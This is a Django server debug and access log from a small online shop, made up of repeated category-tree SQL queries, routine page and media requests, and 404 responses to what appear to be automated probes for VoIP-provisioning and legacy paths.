"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-14 22:23:58,704 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-14 22:23:58,708 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-14 22:23:58,712 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-14 22:23:58,718 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-14 22:23:58,722 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-14 22:23:58,726 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-14 22:23:58,729 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-14 22:23:58,733 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-14 22:23:58,739 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-14 22:23:58,743 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-14 22:23:58,750 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-14 22:23:58,754 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-14 22:23:58,758 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-14 22:23:58,765 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-14 22:23:58,769 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-14 22:23:58,773 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-14 22:23:58,777 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-14 22:23:58,781 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-14 22:23:58,785 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-14 22:23:58,791 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-14 22:23:58,795 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-14 22:23:58,799 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-14 22:23:58,803 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-14 22:23:58,807 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-14 22:23:58,813 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-14 22:23:58,818 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-14 22:23:58,821 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-14 22:23:58,825 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-14 22:23:58,829 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-14 22:23:58,837 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-14 22:23:58,841 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-14 22:23:58,845 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-14 22:23:58,849 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-14 22:23:58,855 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-14 22:23:58,860 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-14 22:23:58,866 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-14 22:23:58,870 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-14 22:23:58,874 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-14 22:23:58,881 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-14 22:23:58,886 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [14/Dec/2019 22:23:58] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [14/Dec/2019 22:23:59] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [14/Dec/2019 22:23:59] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [14/Dec/2019 22:28:20] "GET / HTTP/1.0" 302 0 [14/Dec/2019 22:35:42] "GET / HTTP/1.0" 302 0 [14/Dec/2019 22:40:45] "GET / HTTP/1.0" 302 0 [14/Dec/2019 22:45:46] "GET / HTTP/1.0" 302 0 [14/Dec/2019 22:50:49] "GET / HTTP/1.0" 302 0 [14/Dec/2019 22:55:52] "GET / HTTP/1.0" 302 0 [14/Dec/2019 23:02:22] "GET / HTTP/1.0" 302 0 [14/Dec/2019 23:08:19] "GET / HTTP/1.0" 302 0 [14/Dec/2019 23:13:22] "GET / HTTP/1.0" 302 0 [14/Dec/2019 23:18:24] "GET / HTTP/1.0" 302 0 [14/Dec/2019 23:26:11] "GET / HTTP/1.0" 302 0 [14/Dec/2019 23:32:23] "GET / HTTP/1.0" 302 0 [14/Dec/2019 23:32:37] "GET / HTTP/1.0" 302 0 [14/Dec/2019 23:38:29] "GET / HTTP/1.0" 302 0 [14/Dec/2019 23:43:32] "GET / HTTP/1.0" 302 0 [14/Dec/2019 23:48:34] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [14/Dec/2019 23:51:03] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [14/Dec/2019 23:51:05] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=114 HTTP/1.0" 404 6705 Not Found: /newslist.asp [14/Dec/2019 23:51:06] "GET /newslist.asp?type=4&id=1303 HTTP/1.0" 404 6649 [14/Dec/2019 23:53:37] "GET / HTTP/1.0" 302 0 [14/Dec/2019 23:58:40] "GET / HTTP/1.0" 302 0 [15/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-15 00:08:01,597 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'tftpphone'; args=('tftpphone',) Not Found: /tftpphone/ [15/Dec/2019 00:08:01] "GET /tftpphone/ HTTP/1.0" 404 1734 DEBUG 2019-12-15 00:08:04,053 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'polycom'; args=('polycom',) Not Found: /polycom/ [15/Dec/2019 00:08:04] "GET /polycom/ HTTP/1.0" 404 1730 DEBUG 2019-12-15 00:08:04,549 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'yealink'; args=('yealink',) Not Found: /yealink/ [15/Dec/2019 00:08:04] "GET /yealink/ HTTP/1.0" 404 1730 DEBUG 2019-12-15 00:08:05,453 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'snom'; args=('snom',) Not Found: /snom/ [15/Dec/2019 00:08:05] "GET /snom/ HTTP/1.0" 404 1724 DEBUG 2019-12-15 00:08:11,813 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'snom'; args=('snom',) Not Found: /snom/ [15/Dec/2019 00:08:11] "GET /snom/ HTTP/1.0" 404 1724 DEBUG 2019-12-15 00:08:18,986 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'tftpboot'; args=('tftpboot',) Not Found: /tftpboot/ [15/Dec/2019 00:08:18] "GET /tftpboot/ HTTP/1.0" 404 1732 DEBUG 2019-12-15 00:08:23,101 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'tftpboot'; args=('tftpboot',) Not Found: /tftpboot/ [15/Dec/2019 00:08:23] "GET /tftpboot/ HTTP/1.0" 404 1732 DEBUG 2019-12-15 00:08:27,774 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'grandstream'; args=('grandstream',) Not Found: /grandstream/ [15/Dec/2019 00:08:27] "GET /grandstream/ HTTP/1.0" 404 1738 DEBUG 2019-12-15 00:08:29,213 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'panasonic'; args=('panasonic',) Not Found: /panasonic/ [15/Dec/2019 00:08:29] "GET /panasonic/ HTTP/1.0" 404 1734 DEBUG 2019-12-15 00:08:33,882 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'CALIX'; args=('CALIX',) Not Found: /CALIX/ [15/Dec/2019 00:08:33] "GET /CALIX/ HTTP/1.0" 404 1726 DEBUG 2019-12-15 00:08:35,281 utils 20136 140506411554560 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'gs'; args=('gs',) Not Found: /gs/ [15/Dec/2019 00:08:35] "GET /gs/ HTTP/1.0" 404 1720 DEBUG 2019-12-15 00:08:42,112 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'gs'; args=('gs',) Not Found: /gs/ [15/Dec/2019 00:08:42] "GET /gs/ HTTP/1.0" 404 1720 DEBUG 2019-12-15 00:08:47,297 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'tftp'; args=('tftp',) Not Found: /tftp/ [15/Dec/2019 00:08:47] "GET /tftp/ HTTP/1.0" 404 1724 DEBUG 2019-12-15 00:08:49,330 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'tftp'; args=('tftp',) Not Found: /tftp/ [15/Dec/2019 00:08:49] "GET /tftp/ HTTP/1.0" 404 1724 DEBUG 2019-12-15 00:08:52,127 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'shawc'; args=('shawc',) Not Found: /shawc/ [15/Dec/2019 00:08:52] "GET /shawc/ HTTP/1.0" 404 1726 DEBUG 2019-12-15 00:08:54,361 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'prov'; args=('prov',) Not Found: /prov/ [15/Dec/2019 00:08:54] "GET /prov/ HTTP/1.0" 404 1724 DEBUG 2019-12-15 00:08:57,210 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'provisioning'; args=('provisioning',) Not Found: /provisioning/ [15/Dec/2019 00:08:57] "GET /provisioning/ HTTP/1.0" 404 1740 DEBUG 2019-12-15 00:09:01,524 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'provision'; args=('provision',) Not Found: /provision/ [15/Dec/2019 00:09:01] "GET /provision/ HTTP/1.0" 404 1734 DEBUG 2019-12-15 00:09:04,613 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'spa'; args=('spa',) Not Found: /spa/ [15/Dec/2019 00:09:04] "GET /spa/ HTTP/1.0" 404 1722 DEBUG 2019-12-15 00:09:07,509 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'spirittelecom'; args=('spirittelecom',) Not Found: /spirittelecom/ [15/Dec/2019 00:09:07] "GET /spirittelecom/ HTTP/1.0" 404 1742 DEBUG 2019-12-15 00:09:13,447 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'spirittelecom'; args=('spirittelecom',) Not Found: /spirittelecom/ [15/Dec/2019 00:09:13] "GET /spirittelecom/ 